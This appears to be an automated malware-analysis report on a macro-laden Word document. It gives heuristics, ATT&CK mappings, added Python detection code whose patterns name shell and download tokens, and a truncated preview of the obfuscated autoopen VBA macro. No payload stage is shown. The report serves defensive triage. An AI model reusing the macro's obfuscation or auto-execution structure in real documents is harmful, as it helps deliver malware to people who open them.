Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample is a malicious Office document carrying a VBA macro with an AutoOpen entry point, so the macro runs as soon as the document is opened on a host whose macro security settings allow it. GetObject calls found in the VBA source and in the compiled p-code show that it retrieves or instantiates COM objects, a common way to launch code or reach external resources, and the ClamAV signature match corroborates the verdict. Its likely role is a downloader for a second stage. None of the heuristics below shows an exploit against a parser: the execution path on this page is a user-enabled macro, which ATT&CK maps to T1204.002 (User Execution: Malicious File) rather than T1203.
Heuristics (7):
- ClamAV: Doc.Malware.Droo-6895763-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Droo-6895763-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample a VBA project was in fact recovered (see the extracted artifacts), so treat this marker as corroborating the AutoOpen finding, not as independent evidence.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the OOXML DrawingML namespace URI; Office does not fetch it, it appears in practically every modern Office file, and it is not an indicator.
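The two heuristics that carry most of the weight here, OLE_VBA_PCODE_AUTOEXEC_EXEC and EMBEDDED_URL, are easy to reproduce on decoded macro source. The Python below is an added example written for this page, not the analyzer's own code: it looks for an auto-execution entry point together with shell/download/object-execution tokens, counts the opaque `If a = b Then` predicates that pad the preview, and sorts extracted URLs into XML namespace URIs versus URLs that need review. The token lists, the namespace allowlist, and the two embedded macros are all my own choices; the macros are constructed (modelled on the preview), and the GetObject line in the first one is an assumption standing in for the call the report flags but does not show. It assumes source already decompressed by olevba and does not parse raw module streams or p-code.

```python
"""Added triage helpers (not part of the analyzer that produced this report).

They re-implement, on decoded VBA source, two signals the report's heuristics
describe: an auto-execution entry point co-occurring with shell/download/object
execution tokens, and the observation that schema namespace URLs pulled from a
document body are not indicators by themselves.  Token lists, the opaque-predicate
check and the namespace allowlist are my own choices, not the analyzer's.
"""
import re
from urllib.parse import urlparse

# Constructed sample modelled on the report's preview: junk arithmetic inside
# comparisons of never-assigned variables, an autoopen entry point, and a
# GetObject call standing in for the one the report flags (the preview is
# truncated before it, so its exact form is an assumption).
SAMPLE_MACRO = r'''
Attribute VB_Name = "uUAAGQ"
Function YABAXD()
If SADUQQ = iQBAADC Then
uAAQ_AcB = 888878741 * Z_A1GA
mACXDGwX = KDQZ4D / 538792184 + (toXAXD - Tan(ZcDAAAA + 805681129))
End If
End Function
Sub autoopen()
On Error Resume Next
If lAoCAAxD = u__1AUD Then
nDwA1A = 812616669 * YAAxQA
End If
Set obj = GetObject(stage)
End Sub
'''

# Constructed benign macro for comparison.
BENIGN_MACRO = r'''
Sub FormatReport()
Dim i As Integer
For i = 1 To 10
Cells(i, 1).Value = i * 2
Next i
End Sub
'''

# Entry points Office runs with no user action beyond opening the file.
AUTOEXEC_RE = re.compile(
    r"\b(Auto_?Open|Auto_?Close|Auto_?Exec|Auto_?New|Document_Open|Document_Close|"
    r"Document_New|Workbook_Open|Workbook_Activate)\b", re.I)

# Execution tokens grouped the way the report's heuristic describes them.
EXEC_TOKEN_RES = {
    "shell": re.compile(r"\b(Shell|ShellExecute|WScript\.Shell)\b", re.I),
    "download": re.compile(r"\b(URLDownloadToFile|XMLHTTP|WinHttpRequest|ServerXMLHTTP)\b", re.I),
    "object": re.compile(r"\b(GetObject|CreateObject|CallByName)\b", re.I),
}

# "If a = b Then" where neither side is ever assigned: without Option Explicit
# both are Empty Variants, so the branch always runs; it exists only as bloat.
OPAQUE_IF_RE = re.compile(r"^\s*If\s+([A-Za-z_]\w*)\s*=\s*([A-Za-z_]\w*)\s*Then\s*$", re.I | re.M)
ASSIGN_RE = re.compile(r"^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=", re.I | re.M)

# Hosts that occur in document bodies as XML namespace URIs and are never
# fetched by Office.  Allowlist is my own; extend as needed.
NAMESPACE_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com", "www.w3.org", "purl.org"}


def find_autoexec(src):
    """Lower-cased auto-execution entry point names present in the source."""
    return sorted({m.group(1).lower() for m in AUTOEXEC_RE.finditer(src)})


def find_exec_tokens(src):
    """Execution tokens found, keyed by category, lower-cased and de-duplicated."""
    return {k: sorted({m.group(1).lower() for m in rx.finditer(src)}) for k, rx in EXEC_TOKEN_RES.items()}


def count_opaque_predicates(src):
    """Number of If-comparisons whose operands are never assigned anywhere."""
    assigned = {m.group(1).lower() for m in ASSIGN_RE.finditer(src)}
    return sum(1 for a, b in OPAQUE_IF_RE.findall(src)
               if a.lower() not in assigned and b.lower() not in assigned)


def triage(src):
    """Combine the signals; the last key mirrors OLE_VBA_PCODE_AUTOEXEC_EXEC."""
    autoexec = find_autoexec(src)
    tokens = find_exec_tokens(src)
    return {
        "autoexec": autoexec,
        "exec_tokens": tokens,
        "opaque_predicates": count_opaque_predicates(src),
        "autoexec_with_execution": bool(autoexec) and any(tokens.values()),
    }


def classify_url(url):
    """'namespace' for known XML schema hosts, 'review' for everything else."""
    host = (urlparse(url).hostname or "").lower()
    return "namespace" if host in NAMESPACE_HOSTS else "review"


if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(name, triage(src))
    print(classify_url("http://schemas.openxmlformats.org/drawingml/2006/main"))
```

Feed it the module source that olevba prints for a document. For p-code-only samples, where the report's heuristic works on the compiled stream, the same token scan can be run over strings recovered from the module stream (for example with pcodedmp), at the cost of more false positives from the identifier table.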
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 60956 bytes | 58d1773ba6c26fe9bc641e3112fedd94fb4bd5dbbd967718abd23289f30e2749 |

Preview script (first 1,000 lines of the extracted script). The visible part shows the obfuscation pattern: every If compares two variables that are never assigned (uninitialized Variants, so each branch always runs) and then performs throwaway arithmetic into variables that are never read, with autoopen wrapped in On Error Resume Next so that any runtime error in the junk is swallowed. The GetObject call flagged above lies beyond the lines shown.
Attribute VB_Name = "uUAAGQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YABAXD()
If SADUQQ = iQBAADC Then
uAAQ_AcB = 888878741 * Z_A1GA
mACXDGwX = KDQZ4D / 538792184 / 648401493 + 540241597 * 905772087 / 824013328 + (toXAXD - Tan(ZcDAAAA + 805681129 - 851011768 - Oct(zAUQZcBD - Hex(768606491) + 36956884 + Oct(892315431))) + (480647307 / Sqr(40570017)))
E1XQxB = 464988884 * SUDXAkBG
End If
If XAoxwXo = qkUUUkB Then
JkwQAAQB = 309639586 * jBGc4D
ZUA4Qx = dAAQAAU / 794003604 / 100734420 + 385941752 * 901536742 / 212631724 + (SoAwxc - Tan(pA_Qkw_ + 512281271 - 677824301 - Oct(NwDAAA - Hex(189007814) + 442545052 + Oct(876327097))) + (871803250 / Sqr(203362537)))
AAABoAx = 32221473 * zBAcAX
End If
If hADcAxG = vBZZBB4c Then
GDCUAAxU = 855403583 * sGCDAc
OQXDCQD = JUxAAGU / 75520102 / 698186674 + 538163502 * 667638725 / 249789112 + (qQ4AXQ - Tan(dADCDC1 + 993441065 - 838481048 - Oct(aQAA1A - Hex(986194334) + 228953373 + Oct(296958164))) + (216628725 / Sqr(447222976)))
zZD1DZX = 176219481 * r1A_BQA
End If
If RoXGok_B = Ox1DQUQ4 Then
vCDZBBA = 295894980 * UCAAAw
ScAXBXw = NwDUoZ / 209823501 / 30696457 + 381666527 * 528298984 / 681695391 + (PAD_BAw - Tan(c4xABoAk + 147684985 - 273512151 - Oct(cAkAQA - Hex(605771107) + 313793255 + Oct(769051826))) + (682560952 / Sqr(418414289)))
iZDDAo = 310648932 * jAG4GA
End If
If DZUB1kD = iBXAwAc Then
wDxAkBB = 685102660 * PAAAcx
j4x_ADD = SAXwcX / 28805962 / 924213397 + 659305860 * 305546913 / 805719473 + (l44QAA - Tan(KAAo1o + 427230615 - 465388462 - Oct(JAA_oADA - Hex(139328790) + 14449318 + Oct(519724927))) + (322441204 / Sqr(700461209)))
bBUBk1AB = 116906929 * tDGA4_X
End If
If zDAckAX = ZUAAAAxA Then
bUxDAwUQ = 828576262 * qwADG1
YDDcZZC = tAAC_Q_A / 910957438 / 7896490 + 11474067 * 754344539 / 400014959 + (RQGZUCQ - Tan(ZAAAAQ + 876080710 - 864828435 - Oct(iBU1AGQX - Hex(747469874) + 300746359 + Oct(750140348))) + (667057452 / Sqr(64534236)))
jcA__Akw = 552311063 * LxXUkA
End If
If TQ_BXA = LAAAAw4o Then
OAUBGUCk = 344232585 * voQAAG
pA_AAA = iDAc1XB / 986043874 / 563166946 + 301960935 * 807096671 / 855556357 + (CUAGA_X - Tan(ckAAxA + 580273531 - 646137033 - Oct(G1QXAoA - Hex(28541599) + 539684308 + Oct(346980475))) + (336587771 / Sqr(865762115)))
JQQUD4 = 541918621 * E4o_AAA
End If
If FUkAAAG = bQ1AUQBA Then
YBAXAxZA = 491993165 * roAZBDDA
WCkDkXZ = ZcUBD4 / 306634791 / 204146704 + 780307494 * 312953431 / 339698840 + (XAUoD1 - Tan(LAcDAoG + 111908974 - 237480094 - Oct(MU4oAxBA - Hex(270982720) + 144136245 + Oct(575722000))) + (18865400 / Sqr(706819969)))
ZDUwAX = 839933053 * dU_AUA
End If
If EDAA4AA = L1QAcxAD Then
oUAxADQG = 435303769 * jAB1ADU
RAAkoACo = AxQAAGx / 69795275 / 875219443 + 48581205 * 62254386 / 265738484 + (NQxccAAw - Tan(XQBCk4AA + 716241499 - 11720814 - Oct(vCZ441B - Hex(402114629) + 828613375 + Oct(68065683))) + (545619320 / Sqr(171020734)))
UcA4QA = 375754650 * bkDCAAAQ
End If
End Function
Sub autoopen()
On Error Resume Next
If lAoCAAxD = u__1AUD Then
nDwA1A = 812616669 * YAAxQA
qwAGCD = SDQAAAA / 416222261 / 997207107 + 394096036 * 322589883 / 519404136 + (ocDc4AG - Tan(WQDBoXDQ + 273806910 - 146596640 - Oct(ExAcQQZx - Hex(140042709) + 719667344 + Oct(235671124))) + (293120058 / Sqr(233511879)))
ic_oA_kD = 889587650 * SwA4ADA
End If
If joAAZAA = mAZxAD Then
uAAQAX = 278701557 * mAA4_cB
dBADA4 = MXDBcoA / 353977103 / 267331403 + 103246264 * 230330714 / 716065697 + (IQxQAGU - Tan(wAZAAAAB + 450182160 - 599796431 - Oct(FAAAQ4AX - Hex(889495288) + 353323007 + Oct(555858182))) + (269642298 / Sqr(901513165)))
DQc_wC = 437399596 * ZAcD_Q
End If
... (truncated)